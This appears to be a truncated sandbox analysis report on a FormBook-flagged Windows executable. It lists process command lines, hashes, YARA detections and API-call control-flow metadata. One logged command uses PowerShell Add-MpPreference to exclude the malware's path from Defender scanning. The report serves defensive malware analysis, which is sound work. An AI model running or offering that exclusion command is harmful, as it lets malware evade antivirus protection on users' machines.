                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0x370000
                                                    File size:433'152 bytes
                                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:4
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Users\user\Desktop\NU1aAbSmCr.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\NU1aAbSmCr.exe"
                                                    Imagebase:0xb20000
                                                    File size:694'784 bytes
                                                    MD5 hash:519B9A9E52AA6E23736F01AFA4001654
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1824100351.0000000003450000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1821048829.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.1822625318.0000000001950000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:low
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:08:00:58
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff70f010000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:6
                                                    Start time:08:01:02
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                    Imagebase:0x7ff72d8c0000
                                                    File size:496'640 bytes
                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                    Has elevated privileges:true
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:10
                                                    Start time:08:01:38
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.2580938292.0000000002D40000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:11
                                                    Start time:08:01:40
                                                    Start date:09/10/2024
                                                    Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                    Imagebase:0x5f0000
                                                    File size:32'768 bytes
                                                    MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2580801626.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2581282687.0000000003610000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.2578681040.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:14
                                                    Start time:08:01:52
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Program Files (x86)\ZFyhsaImMGOFEfKEektcPzxHoWTTOspFruWOLxwRgdfvda\mCFHCvdrqdDiDT.exe"
                                                    Imagebase:0x50000
                                                    File size:140'800 bytes
                                                    MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.2583578419.00000000049B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    Reputation:high
                                                    Has exited:false

                                                    Target ID:15
                                                    Start time:08:02:04
                                                    Start date:09/10/2024
                                                    Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                    Imagebase:0x7ff73feb0000
                                                    File size:676'768 bytes
                                                    MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true


                                                      Execution Graph

                                                      Execution Coverage:9.9%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:191
                                                      Total number of Limit Nodes:12
                                                      execution_graph 31013 f94668 31014 f9467a 31013->31014 31015 f94686 31014->31015 31019 f94779 31014->31019 31025 f93e34 31015->31025 31017 f946a5 31020 f94780 31019->31020 31029 f94883 31020->31029 31033 f9487b 31020->31033 31037 f94888 31020->31037 31026 f93e3f 31025->31026 31045 f95cb8 31026->31045 31028 f9709e 31028->31017 31031 f948af 31029->31031 31030 f9498c 31031->31030 31041 f944b4 31031->31041 31035 f94884 31033->31035 31034 f9498c 31034->31034 31035->31034 31036 f944b4 CreateActCtxA 31035->31036 31036->31034 31038 f948af 31037->31038 31039 f944b4 CreateActCtxA 31038->31039 31040 f9498c 31038->31040 31039->31040 31042 f95918 CreateActCtxA 31041->31042 31044 f959db 31042->31044 31044->31044 31046 f95cc3 31045->31046 31049 f95cf8 31046->31049 31048 f9718d 31048->31028 31050 f95d03 31049->31050 31053 f95d28 31050->31053 31052 f97262 31052->31048 31054 f95d33 31053->31054 31057 f95d58 31054->31057 31056 f97365 31056->31052 31058 f95d63 31057->31058 31060 f988cb 31058->31060 31065 f9ab79 31058->31065 31059 f98909 31059->31056 31060->31059 31070 f9cc70 31060->31070 31075 f9cc65 31060->31075 31080 f9cc61 31060->31080 31066 f9ab80 31065->31066 31085 f9afa1 31066->31085 31090 f9afb0 31066->31090 31067 f9ab86 31067->31060 31071 f9cc91 31070->31071 31072 f9ccb5 31071->31072 31104 f9d228 31071->31104 31108 f9d221 31071->31108 31072->31059 31076 f9cc6c 31075->31076 31077 f9ccb5 31076->31077 31078 f9d228 3 API calls 31076->31078 31079 f9d221 3 API calls 31076->31079 31077->31059 31078->31077 31079->31077 31081 f9cc68 31080->31081 31082 f9ccb5 31081->31082 31083 f9d228 3 API calls 31081->31083 31084 f9d221 3 API calls 31081->31084 31082->31059 31083->31082 31084->31082 31086 f9afa8 31085->31086 31087 f9afbf 31086->31087 31094 f9b0a8 31086->31094 31099 f9b097 31086->31099 31087->31067 31092 f9b0a8 GetModuleHandleW 31090->31092 31093 f9b097 GetModuleHandleW 31090->31093 31091 f9afbf 31091->31067 31092->31091 
31093->31091 31095 f9b0b9 31094->31095 31096 f9b0dc 31094->31096 31095->31096 31097 f9b2e0 GetModuleHandleW 31095->31097 31096->31087 31098 f9b30d 31097->31098 31098->31087 31100 f9b0dc 31099->31100 31101 f9b0b9 31099->31101 31100->31087 31101->31100 31102 f9b2e0 GetModuleHandleW 31101->31102 31103 f9b30d 31102->31103 31103->31087 31105 f9d235 31104->31105 31106 f9d26f 31105->31106 31112 f9cff0 31105->31112 31106->31072 31109 f9d235 31108->31109 31110 f9cff0 3 API calls 31109->31110 31111 f9d26f 31109->31111 31110->31111 31111->31072 31113 f9cffb 31112->31113 31115 f9db80 31113->31115 31116 f9d11c 31113->31116 31115->31115 31117 f9d127 31116->31117 31118 f95d58 3 API calls 31117->31118 31119 f9dbef 31118->31119 31122 f9f980 31119->31122 31120 f9dc29 31120->31115 31123 f9f9b1 31122->31123 31125 f9fab1 31122->31125 31124 f9f9bd 31123->31124 31126 4f509b4 CreateWindowExW 31123->31126 31127 4f509c0 CreateWindowExW 31123->31127 31128 4f509bb CreateWindowExW 31123->31128 31124->31120 31125->31120 31126->31125 31127->31125 31128->31125 31129 c9d01c 31130 c9d034 31129->31130 31131 c9d08e 31130->31131 31137 4f52c08 31130->31137 31145 4f52c0c 31130->31145 31153 4f51ea0 31130->31153 31157 4f51eb0 31130->31157 31161 4f51434 31130->31161 31138 4f52c10 31137->31138 31139 4f52c79 31138->31139 31141 4f52c69 31138->31141 31179 4f5155c 31139->31179 31169 4f52da0 31141->31169 31174 4f52d93 31141->31174 31142 4f52c77 31146 4f52c14 31145->31146 31147 4f52c79 31146->31147 31149 4f52c69 31146->31149 31148 4f5155c CallWindowProcW 31147->31148 31150 4f52c77 31148->31150 31151 4f52da0 CallWindowProcW 31149->31151 31152 4f52d93 CallWindowProcW 31149->31152 31150->31150 31151->31150 31152->31150 31154 4f51ea8 31153->31154 31155 4f51434 CallWindowProcW 31154->31155 31156 4f51ef7 31155->31156 31156->31131 31158 4f51ed6 31157->31158 31159 4f51434 CallWindowProcW 31158->31159 31160 4f51ef7 31159->31160 31160->31131 31162 4f5143f 31161->31162 31163 4f52c79 31162->31163 31165 4f52c69 31162->31165 
31164 4f5155c CallWindowProcW 31163->31164 31166 4f52c77 31164->31166 31167 4f52da0 CallWindowProcW 31165->31167 31168 4f52d93 CallWindowProcW 31165->31168 31166->31166 31167->31166 31168->31166 31171 4f52db4 31169->31171 31170 4f52e40 31170->31142 31183 4f52e53 31171->31183 31186 4f52e58 31171->31186 31175 4f52db4 31174->31175 31177 4f52e53 CallWindowProcW 31175->31177 31178 4f52e58 CallWindowProcW 31175->31178 31176 4f52e40 31176->31142 31177->31176 31178->31176 31180 4f51567 31179->31180 31181 4f5435a CallWindowProcW 31180->31181 31182 4f54309 31180->31182 31181->31182 31182->31142 31184 4f52e69 31183->31184 31189 4f5429e 31183->31189 31184->31170 31187 4f52e69 31186->31187 31188 4f5429e CallWindowProcW 31186->31188 31187->31170 31188->31187 31190 4f5155c CallWindowProcW 31189->31190 31191 4f542aa 31190->31191 31191->31184 31192 f9d340 31193 f9d386 31192->31193 31197 f9d519 31193->31197 31200 f9d520 31193->31200 31194 f9d473 31198 f9d54e 31197->31198 31203 f9d0b8 31197->31203 31198->31194 31201 f9d0b8 DuplicateHandle 31200->31201 31202 f9d54e 31201->31202 31202->31194 31204 f9d588 DuplicateHandle 31203->31204 31205 f9d61e 31204->31205 31205->31198 31206 4f57368 31207 4f57395 31206->31207 31214 4f570e8 31207->31214 31210 4f570e8 3 API calls 31211 4f57429 31210->31211 31212 4f570e8 3 API calls 31211->31212 31213 4f574bf 31212->31213 31215 4f570f3 31214->31215 31218 4f57298 31215->31218 31217 4f573f7 31217->31210 31219 4f572a3 31218->31219 31220 4f59642 31219->31220 31222 f95d58 3 API calls 31219->31222 31224 f98609 31219->31224 31232 f95db7 31219->31232 31220->31217 31222->31220 31225 f98643 31224->31225 31227 f988cb 31225->31227 31231 f9ab79 2 API calls 31225->31231 31226 f98909 31226->31220 31227->31226 31228 f9cc61 3 API calls 31227->31228 31229 f9cc70 3 API calls 31227->31229 31230 f9cc65 3 API calls 31227->31230 31228->31226 31229->31226 31230->31226 31231->31227 31233 f95dbb 31232->31233 31235 f95d63 31232->31235 31234 f98909 31234->31220 31236 f988cb 
31235->31236 31240 f9ab79 2 API calls 31235->31240 31236->31234 31237 f9cc61 3 API calls 31236->31237 31238 f9cc70 3 API calls 31236->31238 31239 f9cc65 3 API calls 31236->31239 31237->31234 31238->31234 31239->31234 31240->31236 31241 6ed1b10 31242 6ed1cd0 31241->31242 31244 6ed1b36 31241->31244 31243 6ed1c9b 31244->31243 31246 6ed0088 31244->31246 31247 6ed1d90 PostMessageW 31246->31247 31248 6ed1dfc 31247->31248 31248->31244
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1371935689.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6ed0000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7b329621c10687f8cd315233585fdbd1027ce64b7372108311a5ab9f433f06ce
                                                      • Instruction ID: 71ac25e0dd6a1b2115f0655bd1e9be61cd068db5da25e02716f98abd69545d81
                                                      • Opcode Fuzzy Hash: 7b329621c10687f8cd315233585fdbd1027ce64b7372108311a5ab9f433f06ce
                                                      • Instruction Fuzzy Hash: 1071F771D45329CFEB68CF66CC407E9BBB6BF89300F14D1AAD509A6250EB715A86CF40

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 943 f9b0a8-f9b0b7 944 f9b0b9-f9b0c6 call f99b14 943->944 945 f9b0e3-f9b0e7 943->945 950 f9b0c8 944->950 951 f9b0dc 944->951 947 f9b0e9-f9b0f3 945->947 948 f9b0fb-f9b13c 945->948 947->948 954 f9b149-f9b157 948->954 955 f9b13e-f9b146 948->955 998 f9b0ce call f9b331 950->998 999 f9b0ce call f9b340 950->999 951->945 956 f9b159-f9b15e 954->956 957 f9b17b-f9b17d 954->957 955->954 959 f9b169 956->959 960 f9b160-f9b167 call f9ad10 956->960 962 f9b180-f9b187 957->962 958 f9b0d4-f9b0d6 958->951 961 f9b218-f9b2d8 958->961 964 f9b16b-f9b179 959->964 960->964 993 f9b2da-f9b2dd 961->993 994 f9b2e0-f9b30b GetModuleHandleW 961->994 965 f9b189-f9b191 962->965 966 f9b194-f9b19b 962->966 964->962 965->966 968 f9b1a8-f9b1b1 call f9ad20 966->968 969 f9b19d-f9b1a5 966->969 974 f9b1be-f9b1c3 968->974 975 f9b1b3-f9b1bb 968->975 969->968 976 f9b1e1-f9b1ee 974->976 977 f9b1c5-f9b1cc 974->977 975->974 984 f9b211-f9b217 976->984 985 f9b1f0-f9b20e 976->985 977->976 979 f9b1ce-f9b1de call f9ad30 call f9ad40 977->979 979->976 985->984 993->994 995 f9b30d-f9b313 994->995 996 f9b314-f9b328 994->996 995->996 998->958 999->958
                                                      APIs
                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00F9B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: HandleModule
                                                      • String ID:
                                                      • API String ID: 4139908857-0
                                                      • Opcode ID: 7828e3ae51e4cf0b058ba33e509bed93d9379cc3cf4e173edb005ca5c0057368
                                                      • Instruction ID: 83300f11a69d2fb5d59b8d44b55226c46019698eb4b11de5afa2502709338b04
                                                      • Opcode Fuzzy Hash: 7828e3ae51e4cf0b058ba33e509bed93d9379cc3cf4e173edb005ca5c0057368
                                                      • Instruction Fuzzy Hash: A7716770A00B058FEB24DF2AE55175ABBF1FF88314F00892DD486D7A50DB75E846CB91

                                                      Control-flow Graph

                                                      control_flow_graph 1000 4f51408-4f51d5e 1002 4f51d60-4f51d66 1000->1002 1003 4f51d69-4f51d70 1000->1003 1002->1003 1004 4f51d72-4f51d78 1003->1004 1005 4f51d7b-4f51e1a CreateWindowExW 1003->1005 1004->1005 1007 4f51e23-4f51e5b 1005->1007 1008 4f51e1c-4f51e22 1005->1008 1012 4f51e5d-4f51e60 1007->1012 1013 4f51e68 1007->1013 1008->1007 1012->1013 1014 4f51e69 1013->1014 1014->1014
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: df9e557f435391b18ce593e8f6d167c93ee041f7cae6a33df04b0e9a11685ad9
                                                      • Instruction ID: dce689fcdaf752a7209ad89dfff25fc4f1c01073fab159898a1b757158e53fb8
                                                      • Opcode Fuzzy Hash: df9e557f435391b18ce593e8f6d167c93ee041f7cae6a33df04b0e9a11685ad9
                                                      • Instruction Fuzzy Hash: A751A0B1D00309DFDB14CF9AD984ADEBBB5FF48310F64812AE919AB210D775A945CF90

                                                      Control-flow Graph

                                                      control_flow_graph 1015 4f51cec-4f51d5e 1017 4f51d60-4f51d66 1015->1017 1018 4f51d69-4f51d70 1015->1018 1017->1018 1019 4f51d72-4f51d78 1018->1019 1020 4f51d7b-4f51db3 1018->1020 1019->1020 1021 4f51dbb-4f51e1a CreateWindowExW 1020->1021 1022 4f51e23-4f51e5b 1021->1022 1023 4f51e1c-4f51e22 1021->1023 1027 4f51e5d-4f51e60 1022->1027 1028 4f51e68 1022->1028 1023->1022 1027->1028 1029 4f51e69 1028->1029 1029->1029
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 0628a99eff14a8de704558901610bd485e4e3bd17257a5973302761739cb265f
                                                      • Instruction ID: 2414fb8f240f0e0efdeec3312200d7a3b44272cf87d4abc1ab37e26e1ced9b19
                                                      • Opcode Fuzzy Hash: 0628a99eff14a8de704558901610bd485e4e3bd17257a5973302761739cb265f
                                                      • Instruction Fuzzy Hash: 1A51A0B1D00309DFDB14CF9AD984ADEBBB5BF48310F64812AE919AB220D775A945CF90

                                                      Control-flow Graph

                                                      control_flow_graph 1030 4f51cf4-4f51d5e 1031 4f51d60-4f51d66 1030->1031 1032 4f51d69-4f51d70 1030->1032 1031->1032 1033 4f51d72-4f51d78 1032->1033 1034 4f51d7b-4f51db3 1032->1034 1033->1034 1035 4f51dbb-4f51e1a CreateWindowExW 1034->1035 1036 4f51e23-4f51e5b 1035->1036 1037 4f51e1c-4f51e22 1035->1037 1041 4f51e5d-4f51e60 1036->1041 1042 4f51e68 1036->1042 1037->1036 1041->1042 1043 4f51e69 1042->1043 1043->1043
                                                      APIs
                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F51E0A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CreateWindow
                                                      • String ID:
                                                      • API String ID: 716092398-0
                                                      • Opcode ID: 4cec1f26b07ae99d1ade77b20103e6011c7abe81f0db28cd500b784c28fe5c49
                                                      • Instruction ID: 9770cb6cffd473df1dce809437a5778d62281e7a63d1f8577f02ae19bc85fcb8
                                                      • Opcode Fuzzy Hash: 4cec1f26b07ae99d1ade77b20103e6011c7abe81f0db28cd500b784c28fe5c49
                                                      • Instruction Fuzzy Hash: 7B41CFB1D003099FDF14CF9AD984ADEBBB5FF48310F64812AE918AB210D775A946CF90

                                                      Control-flow Graph

                                                      control_flow_graph 1044 4f5155c-4f542fc 1047 4f54302-4f54307 1044->1047 1048 4f543ac-4f543cc call 4f51434 1044->1048 1050 4f54309-4f54340 1047->1050 1051 4f5435a-4f54392 CallWindowProcW 1047->1051 1055 4f543cf-4f543dc 1048->1055 1058 4f54342-4f54348 1050->1058 1059 4f54349-4f54358 1050->1059 1053 4f54394-4f5439a 1051->1053 1054 4f5439b-4f543aa 1051->1054 1053->1054 1054->1055 1058->1059 1059->1055
                                                      APIs
                                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F54381
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1365378642.0000000004F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_4f50000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: CallProcWindow
                                                      • String ID:
                                                      • API String ID: 2714655100-0
                                                      • Opcode ID: f9d35c5836c71b46391e773c217d808cf2241c553dcde43e04f5a86630546efd
                                                      • Instruction ID: bb152878137e66d75a6f41af4d2235f2ef1cc7809cd07acd040e713ede411954
                                                      • Opcode Fuzzy Hash: f9d35c5836c71b46391e773c217d808cf2241c553dcde43e04f5a86630546efd
                                                      • Instruction Fuzzy Hash: 6B411AB5900305DFDB14CF99C448BAABBF5FF88314F248459E519AB321D775A842CFA1

                                                      Control-flow Graph

                                                      control_flow_graph 1061 f944b4-f959d9 CreateActCtxA 1065 f959db-f959e1 1061->1065 1066 f959e2-f95a3c 1061->1066 1065->1066 1073 f95a4b-f95a4f 1066->1073 1074 f95a3e-f95a41 1066->1074 1075 f95a51-f95a5d 1073->1075 1076 f95a60 1073->1076 1074->1073 1075->1076 1078 f95a61 1076->1078 1078->1078
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 0d063a56bbf14f18ee18b6169f517cb7353d573584444000fcc8c7a592ab897d
                                                      • Instruction ID: 5f55cd22ce3642a8c54f197c48d8cbe43bbae361e1a238ada973c1a6ef4d91b1
                                                      • Opcode Fuzzy Hash: 0d063a56bbf14f18ee18b6169f517cb7353d573584444000fcc8c7a592ab897d
                                                      • Instruction Fuzzy Hash: 0141D2B1C00718CBEF25CFA9C884B9EBBB5BF48704F20816AD418AB251DB756946DF90

                                                      Control-flow Graph

                                                      control_flow_graph 1079 f9590c-f9598c 1081 f9598f-f959d9 CreateActCtxA 1079->1081 1083 f959db-f959e1 1081->1083 1084 f959e2-f95a3c 1081->1084 1083->1084 1091 f95a4b-f95a4f 1084->1091 1092 f95a3e-f95a41 1084->1092 1093 f95a51-f95a5d 1091->1093 1094 f95a60 1091->1094 1092->1091 1093->1094 1096 f95a61 1094->1096 1096->1096
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: 17b2f4c40f92825d7125ed7d431082ba5bc1432581b391b392db024026706d4f
                                                      • Instruction ID: 9ff1351158adaeb12a3b7773ccde47e182498fd41623079b2fe3ca2f6a63add2
                                                      • Opcode Fuzzy Hash: 17b2f4c40f92825d7125ed7d431082ba5bc1432581b391b392db024026706d4f
                                                      • Instruction Fuzzy Hash: 7F41FFB1C00719CFEF25CFA9C884B9EBBB1BF48704F20816AD418AB251DB756946CF90

                                                      Control-flow Graph

                                                      control_flow_graph 1097 f95a84-f95b14
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a278a44a61e89cd4b3ecaeceb020686cab0c76f6bc2066fa89f2127e4e8cc769
                                                      • Instruction ID: 768caf9a281a341653e3957f4e8843458dd662745ef29fe9a763a32d6740aa1b
                                                      • Opcode Fuzzy Hash: a278a44a61e89cd4b3ecaeceb020686cab0c76f6bc2066fa89f2127e4e8cc769
                                                      • Instruction Fuzzy Hash: E331BD72C05A48CFFF12CFA8C8857EEBBB0AF55724F10418AC055AB251C779A94AEF51

                                                      Control-flow Graph

                                                      control_flow_graph 1100 f95910-f9598c 1102 f9598f-f959d9 CreateActCtxA 1100->1102 1104 f959db-f959e1 1102->1104 1105 f959e2-f95a3c 1102->1105 1104->1105 1112 f95a4b-f95a4f 1105->1112 1113 f95a3e-f95a41 1105->1113 1114 f95a51-f95a5d 1112->1114 1115 f95a60 1112->1115 1113->1112 1114->1115 1117 f95a61 1115->1117 1117->1117
                                                      APIs
                                                      • CreateActCtxA.KERNEL32(?), ref: 00F959C9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: Create
                                                      • String ID:
                                                      • API String ID: 2289755597-0
                                                      • Opcode ID: e1407b67578299d636c49daf1fec132153ea743b4ede6ea3b45d6b8a23b6a386
                                                      • Instruction ID: 2a39efb15096364e718242b7fcc5993ff5c30556e6a09834bbdbfaf16c4eeefe
                                                      • Opcode Fuzzy Hash: e1407b67578299d636c49daf1fec132153ea743b4ede6ea3b45d6b8a23b6a386
                                                      • Instruction Fuzzy Hash: 3241FFB1C00718CFEF25CFA9C884B8EBBB1BF48704F20816AD419AB251DB756946CF90

                                                      Control-flow Graph

                                                      control_flow_graph 1118 f9d0b8-f9d61c DuplicateHandle 1120 f9d61e-f9d624 1118->1120 1121 f9d625-f9d642 1118->1121 1120->1121
                                                      APIs
                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00F9D54E,?,?,?,?,?), ref: 00F9D60F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1349983281.0000000000F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F90000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f90000_NU1aAbSmCr.jbxd
                                                      Similarity
                                                      • API ID: DuplicateHandle
                                                      • String ID:
                                                      • API String ID: 3793708945-0
                                                      • Opcode ID: bf77d612120750672ec224ac023a9c439b741715aa7d62bc51de94c9f3e82804
